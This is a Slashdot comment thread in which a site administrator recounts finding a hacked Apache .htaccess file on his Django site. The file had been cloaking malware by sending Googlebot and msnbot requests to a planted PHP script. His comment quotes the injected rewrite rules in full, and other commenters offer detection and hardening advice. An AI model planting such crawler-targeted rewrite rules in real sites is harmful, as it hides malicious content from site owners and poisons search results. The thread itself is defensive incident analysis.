    The gratuitous comma tag is incredibly appropriate. It's important to remember that if we hope to keep the next generation of students adept at the English language [slashdot.org] we might want to set a good example.

    Since I've referenced poor grammar, there's a 99% chance I made a spelling or grammar error in this post.
  • by uvsc_wolverine (692513) on Thursday February 04, 2010 @12:03PM (#31023132) Homepage
    Yeah, this is pretty scummy. But I've gotta admit, it's also pretty creative.
  • We got hit by this (Score:5, Informative)

    by hedronist (233240) * on Thursday February 04, 2010 @12:47PM (#31023700)

    We get so many 404s because of probes from random script kiddies that I tend to ignore that part of the daily log scan -- big mistake. (I have my own link checker so I know that all of the real URLs are correct and functioning.) It wasn't until the site owner said that we seemed to have dropped off the search results at Google that we knew something was wrong. I couldn't figure out why and spent quite a bit of time banging my head against random walls.

    Although I had looked at the logs I was mostly looking for 500 errors. I finally started to focus on the 404s and little bells started going off when I saw a whole bunch of them for msnbot. And then I saw a whole bunch for googlebot. And then I noticed that they were all under our /media path. I immediately started checking all of the URLs that had 404ed and they all worked fine. Google was also reporting that they were getting a 404 on our sitemap.xml. Shit! I tested it with their 'Test you URL' page and it worked, so I resubmitted it and ... it 404ed! WTF? (I'm still not sure why this got snarled with sitemap.xml, but it was involved.)

    I went and took a long, hot shower -- this is my place of refuge and deep thinking. The question was: what could cause all of these errors for the spider-bots, but not produce them for me or any normal human? I looked like a prune by the time it hit me: they weren't seeing the same pages/files I was. How could that happen? If this was a networking problem it would already be smelling like a firewall issue of some sort -- the unseen middleman.

    I should mention here that this is a Django site, which means I'm pretty much all over the URLs coming in ... except for /media, which are handled directly by Apache as static files. Apache ... hmmm ... !

    Apache's .htaccess file is probably the single most powerful file on your website, and you don't even see it when you do an 'ls'. I popped into the editor and I almost crapped my pants:

    RewriteCond %{HTTP_HOST} (^|www.)example.com
    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g|gif|png|zip|swf|doc|xls|pdf|ico|tar|gz|bmp|rar|mp3|avi|mpeg|flv)(\?|$)
    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$
    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^65\.5[2-5]\.[0-9]+\.[0-9]+$ [OR]
    RewriteCond %{HTTP_USER_AGENT} (google|msnbot)
    RewriteRule ^(.*)$ pop/media/images/07_22/7_22-5.class.php [L]

    Those address ranges, btw, are all for googlebot and msnbot, so this only fires if you are coming from one of those net blocks. The special google URL checker wasn't coming from one of those addresses which is why it worked.

    The scary thing is that this code is correct except for one little detail. The bots were getting 404s because the Black Hats got the path wrong. This isn't a normal PHP site and the topmost directory contains all of the Django stuff in one branch and all of the media in a different branch. Apache sees that topmost directory and it's where the .htaccess file lives, but the master .conf file has a specific <Location> rule that maps directly to /media, not /pop/media. If they had not made that error I don't know how long it would have taken to uncover this.

    We still don't know how they got in. We changed all of the passwords and double-checked that we were up to date on all of the server code. There also are multiple levels of tripwires in place now so I'll know about any changes within minutes of it happening. And now we wait . . . .

    • by CoffeePlease (596791) on Thursday February 04, 2010 @01:01PM (#31023848) Homepage
      If you run insecure web apps, they can use http injection to write to your .htaccess file. See my post on how I fixed my own site after one of these attacks. http://thedesignspace.net/MT2archives/000505.html [thedesignspace.net]
    • by mujadaddy (1238164) on Thursday February 04, 2010 @02:10PM (#31024788)
      Wow, very frightening. You've already been modded Informative, but more people need to read and understand this.
    • by xandroid (680978) on Thursday February 04, 2010 @02:32PM (#31025076) Homepage Journal

      If your site is on a shared server, it may be the case that another user of the server got hacked (or is malicious in the first place) and was able to access your files. In this case, it's a very good idea to notify your host that your files have been messed with.

      Something you may consider: make a backup of a known-good .htaccess, and set up a cronjob to `diff --brief` the two frequently and email you if they're not the same. I've done this with a list of all the PHP files in my account on a shared server:

      7 */4 * * * cd $HOME; find . -name *.php >tmp.phpfiles.txt; if [[ -n "$(diff --brief tmp.phpfiles.txt phpfiles.txt)" ]]; then diff tmp.phpfiles.txt phpfiles.txt | mail -s "new PHP files" YOUR@EMAIL.ADDRESS; fi; rm tmp.phpfiles.txt

      • by hedronist (233240) * on Thursday February 04, 2010 @03:35PM (#31025724)

        Good points.

        This is a dedicated server and has only three accounts with passwords, all of which are strong. Only 4 ports are open: 22 (SSH), 80 (HTTP), 443 (HTTPS), and 8000, which is where I do short runs of the Django development server. The dev server port only responds to a very short list of hardwired IPs. SSH disallows root logins. Apache is chrooted and uses suexec. This last wasn't true before and is quite probably the entry vector.

        I mentioned tripwires. Since everything is under Mercurial VCS we can do several things to make sure nothing has changed. Without going into all of the details, suffice it to say that should something change on the server, alarms will go off. Even monkeying with the alarm mechanism will set off an alarm.

        All of this will not keep a really determined Black Hat out, and I know that. But he won't pwn us for long before we know it and then can take steps to push back the tide once again.

        God, I hate this shit.

    • by Terrasque (796014) on Thursday February 04, 2010 @05:01PM (#31026928) Homepage Journal

      Hey, a fellow django'er :)

      A bit off-topic, but do you load PHP in the same apache as you run your django project?
      I've had some problems with that (shared libraries), plus I don't need php, so I usually turn it off.

      As a side effect, it would help against such an attack too.

      • by hedronist (233240) * on Thursday February 04, 2010 @09:37PM (#31029890)

        Sigh, yes, we do have mod_php and mod_python in the same server. Although I had a problem combining the two on another site (also a Django site, but with an osCommerce store (and, no, I didn't anything to do with that piece of crap)) and it turned out to be a problem with shared MD5 libraries (if memory serves, this was almost 3 years ago). Here I'm running it just because I like phpMyAdmin.

        Now you've made me feel lazy and bad and I hope you're happy with yourself. Maybe I'll run an alternate Apache with mod_php, but only when I'm doing DB reorganization. Sigh.

        I hate this shit.

  • by HikingStick (878216) <z01riemer @ h o t m a i l . com> on Thursday February 04, 2010 @01:02PM (#31023866)
    Kudos on the work you did to figure this one out! I appreciate the time you took to investigate this one.
  • by Sloppy (14984) on Thursday February 04, 2010 @02:23PM (#31024952) Homepage Journal

    But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked

    The very idea of "verifying that a site is not hacked" is ultimately just as flawed as running a virus scanner to verify that you don't have a virus installed. Once a system is compromised, you can't trust it to help you find the problem. Checking to see if it happens to be serving malware right now, isn't reliable since the malware gets to decide whether or not to act suspiciously, and making decisions based on referer and user-agent is really just the tip of the iceberg compared to what is possible. What if it randomly decides to serve malware on 0.01% of the requests? You'll never be able to diagnose it that way, and in the unlikely event that you do happen to see something suspicious, you're going to start questioning yourself when it turns out to not be repeatable.

    Don't install the malware in the first place. I won't say that defending in depth beyond that point is totally useless, but it's pretty close to useless. Once you're infected: game over, you lost.

  • by Anonymous Coward on Thursday February 04, 2010 @04:53PM (#31026806)

    Firefox + Greasemonkey + "Google Image Search Direct Links"

    That puts an extra link on each picture on the Google Image results. A link that just gives you the JPG and nothing else.

  • by vuo (156163) on Thursday February 04, 2010 @05:41PM (#31027416) Homepage

    I never understood why Google wants to load the site as a frame, which is unimaginably distracting and often the image is difficult to find. Rather, if they took a screenshot into the cache and moved the cursor automatically to the image, then it'd be more convenient, more reliable and safer.

"Catch a wave and you're sitting on top of the world." - The Beach Boys

Working...